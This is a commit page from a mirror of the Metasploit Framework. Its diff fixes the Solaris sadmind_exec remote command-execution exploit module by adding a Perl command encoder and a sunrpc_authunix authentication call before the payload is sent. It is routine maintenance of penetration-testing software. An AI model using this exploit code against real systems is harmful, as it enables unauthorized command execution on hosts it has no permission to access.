infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #3518, @midnitesnake's fix for solaris sadmind_exec

bug/bundler_fix
jvazquez-r7 2014-10-27 17:19:06 -05:00
parent 0b6406ae40 bc57e5d057
commit e6e4aaba3e
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 5 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/solaris/sunrpc/sadmind_exec.rb
View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
Vulnerable systems include solaris 2.7, 8, and 9 Vulnerable systems include solaris 2.7, 8, and 9
}, },
'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz' ], 'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
@ -35,9 +35,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Payload' => 'Payload' =>
{ {
'Space' => 2000, 'Space' => 2000,
'BadChars' => "\x00", 'BadChars' => "\x00",
'DisableNops' => true, 'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
'Compat' => 'Compat' =>
{ {
'PayloadType' => 'cmd', 'PayloadType' => 'cmd',
@ -83,6 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
hostname = datastore['HOSTNAME'] hostname = datastore['HOSTNAME']
end end
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
response = sadmind_request(hostname, payload.encoded) response = sadmind_request(hostname, payload.encoded)
sunrpc_destroy sunrpc_destroy